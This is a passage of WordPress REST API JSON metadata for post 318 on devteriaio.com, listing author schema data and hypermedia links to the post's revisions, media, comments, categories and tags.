Giusti"},"logo":{"@id":"https:\/\/devteriaio.com\/#\/schema\/person\/image\/"},"sameAs":["http:\/\/devteriaio.com"],"url":"https:\/\/devteriaio.com\/index.php\/author\/devteria-io\/"}]}},"_links":{"self":[{"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/wp\/v2\/posts\/318","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/wp\/v2\/comments?post=318"}],"version-history":[{"count":2,"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/wp\/v2\/posts\/318\/revisions"}],"predecessor-version":[{"id":323,"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/wp\/v2\/posts\/318\/revisions\/323"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/wp\/v2\/media\/319"}],"wp:attachment":[{"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/w
p\/v2\/media?parent=318"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/wp\/v2\/categories?post=318"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devteriaio.com\/index.php\/wp-json\/wp\/v2\/tags?post=318"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}